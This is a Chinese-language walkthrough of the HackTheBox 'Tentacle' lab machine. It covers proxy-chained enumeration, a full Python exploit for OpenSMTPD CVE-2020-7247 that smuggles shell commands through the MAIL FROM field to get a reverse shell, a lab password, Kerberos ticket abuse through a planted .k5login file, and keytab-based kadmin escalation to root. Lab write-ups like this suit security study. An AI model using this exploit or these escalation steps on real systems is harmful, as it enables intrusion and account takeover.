基本信息

https://www.hackthebox.eu/home/machines/profile/310
10.10.10.224

端口扫描

很费时间：

➜  ~ nmap -sT -Pn 10.10.10.224
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-28 10:10 EST
Nmap scan report for 10.10.10.224
Host is up (0.069s latency).
Not shown: 805 closed ports, 191 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
88/tcp   open  kerberos-sec
3128/tcp open  squid-http

Nmap done: 1 IP address (1 host up) scanned in 1031.14 seconds

3128

3128是squid代理，直接访问错误信息里给出域名：

53

53端口是dns，使用3128端口得到的域名对其进行子域名枚举，可以发现一些子域名及内部ip，应该是需要通过squid代理访问：

dnsenum --threads 64 --dnsserver 10.10.10.224 -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt realcorp.htb

ns.realcorp.htb.                         259200   IN    A        10.197.243.77
proxy.realcorp.htb.                      259200   IN    CNAME    ns.realcorp.htb.
ns.realcorp.htb.                         259200   IN    A        10.197.243.77
wpad.realcorp.htb.                       259200   IN    A        10.197.243.31
ns.realcorp.htb.                         259200   IN    A        10.197.243.77

proxychains

根据得到的信息一步步枚举及尝试，最终的完整代理链：

# proxychains conf
http  10.10.10.224 3128
http  127.0.0.1 3128
http  10.197.243.77 3128

# kali
proxychains4 firefox wpad.realcorp.htb

# hosts
10.197.243.31 wpad.realcorp.htb

nmap

然后通过代理链进行枚举：

➜  ~ proxychains4 nmap 10.197.243.31
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-28 10:09 EST
Nmap scan report for wpad.realcorp.htb (10.197.243.31)
Host is up (0.28s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
464/tcp  open  kpasswd5
749/tcp  open  kerberos-adm
3128/tcp open  squid-http

Nmap done: 1 IP address (1 host up) scanned in 301.92 seconds

wpad.realcorp.htb

直接通过代理访问是403:

wpad.dat

注意wpad是Web Proxy Auto-Discovery Protocol：

WPAD 协议分析及内网渗透利用 - 先知社区
https://xz.aliyun.com/t/1739#toc-9

可以直接查看wpad.dat文件：

function FindProxyForURL(url, host) {
    if (dnsDomainIs(host, "realcorp.htb"))
        return "DIRECT";
    if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0"))
        return "DIRECT";
    if (isInNet(dnsResolve(host), "10.241.251.0", "255.255.255.0"))
        return "DIRECT";

    return "PROXY proxy.realcorp.htb:3128";
}

10.241.251.0/24

根据wpad配置文件可以发现新的子域10.241.251.0，对其进行探测，发现10.241.251.113的25端口是OpenSMTPD：

➜  Tentacle proxychains4 nmap -sC -sV 10.241.251.113
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-28 11:49 EST
Nmap scan report for 10.241.251.113
Host is up (0.28s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
25/tcp open  smtp    OpenSMTPD
Service Info: Host: smtp.realcorp.htb

Nmap done: 1 IP address (1 host up) scanned in 282.22 seconds

OpenSMTPD

smtp_exp.py

import socket, time
import sys
if len(sys.argv) < 4:
    print("usage: getShell.py <host> <port> <command>")
    exit()
HOST = sys.argv[1]
PORT = int(sys.argv[2])
rev_shell_cmd = sys.argv[3]
payload = b"""\r\n

#0\r\n
#1\r\n
#2\r\n
#3\r\n
#4\r\n
#5\r\n
#6\r\n
#7\r\n
#8\r\n
#9\r\n
#a\r\n
#b\r\n 
#c\r\n
#d\r\n
""" + rev_shell_cmd.encode() + b"""
.
"""
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
    af, socktype, proto, canonname, sa = res
    try:
        s = socket.socket(af, socktype, proto)
    except OSError as msg:
        s = None
        continue
    try:
        s.connect(sa)
    except OSError as msg:
        s.close()
        s = None
        continue
    break
if s is None:
    print('could not open socket')
    sys.exit(1)
with s:
    data = s.recv(1024)
    print('Received', repr(data))
    time.sleep(1)
    print('SENDING HELO')
    s.send(b"helo test.com\r\n")
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n")
    time.sleep(1)
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(b"RCPT TO:<j.nakazawa@realcorp.htb>\r\n")
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(b"DATA\r\n")
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(payload)
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(b"QUIT\r\n")
    data = s.recv(1024)
    print('RECIEVED', repr(data))
print("Exploited Check you netcat :D")
s.close()

信息搜集

.msmtprc

在j.nakazawa用户目录可以发现.msmtprc文件，里面有密码，但这个密码不能直接ssh：

# Set default values for all following accounts.
defaults
auth           on
tls            on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
logfile        /dev/null

# RealCorp Mail
account        realcorp
host           127.0.0.1
port           587
from           j.nakazawa@realcorp.htb
user           j.nakazawa
password       sJB}RM>6Z~64_
tls_fingerprint	C9:6A:B9:F6:0A:D4:9C:2B:B9:F6:44:1F:30:B8:5E:5A:D8:0D:A5:60

# Set a default account
account default : realcorp

#kerberos

就是通过kerberos生成ticket，然后ssh直接连接，生成ticket后ssh连接不需要密码，如果提示要密码那就是操作有错：

sudo apt install krb5-user

# /etc/hosts
# hosts只留这一个
10.10.10.224 srv01.realcorp.htb

# /etc/krb5.conf
# 修改/添加对应配置
default_realm = REALCORP.HTB

REALCORP.HTB = {
        kdc = 10.10.10.224
        }
  
# shell
kinit j.nakazawa # 密码就是上面得到的
klist
ssh j.nakazawa@10.10.10.224

user flag

然后用户目录得到user.txt:

提权信息

crontab

定时任务发现admin定时运行log_backup.sh：

[j.nakazawa@srv01 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
* * * * * admin /usr/local/bin/log_backup.sh

log_backup.sh

可以看到是定是从squid目录复制文件到admin目录，那么如果我们可以考虑写入认证文件到squid，使其复制到admin，从而我们可以登录：

[j.nakazawa@srv01 ~]$ cat  /usr/local/bin/log_backup.sh
#!/bin/bash

/usr/bin/rsync -avz --no-perms --no-owner --no-group /var/log/squid/ /home/admin/
cd /home/admin
/usr/bin/tar czf squid_logs.tar.gz.`/usr/bin/date +%F-%H%M%S` access.log cache.log
/usr/bin/rm -f access.log cache.log

admin

就是写一个.k5login文件进去，使得我们可以用之前生成的ticket以admin用户身份登录：

.k5login
j.nakazawa@REALCORP.HTB

cp .k5login /var/log/squid

# 尝试几次，同步需要时间
ssh admin@srv01.realcorp.htb

klist

当前admin用户，klist发现很多ticket：

那么什么是keytab文件？

Keytab是一个文件，其中包含Kerberos主体和加密密钥对（从Kerberos密码派生）。您可以使用keytab文件使用Kerberos对各种远程系统进行身份验证，而无需输入密码

[admin@srv01 ~]$ klist -k /etc/krb5.keytab
Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------------------
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB

exploit

所以我们可以利用kadmin去创建一个root ticket：

kadmin -k -t /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB

add_principal root@REALCORP.HTB
# 密码自己设置

root flag

然后ksu切到root，得到root.txt:

参考资料

WPAD 协议分析及内网渗透利用 - 先知社区
https://xz.aliyun.com/t/1739#toc-9
https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt
https://github.com/superzerosec/cve-2020-7247
Tentacle Foothold tutorial | RaidForums
https://raidforums.com/Thread-Tutorial-Tentacle-Foothold-tutorial
TENTACLE – Jopraveen
https://jopraveen.wordpress.com/2021/01/30/tentacle/

Tentacle - HackTheBox

2021-02-01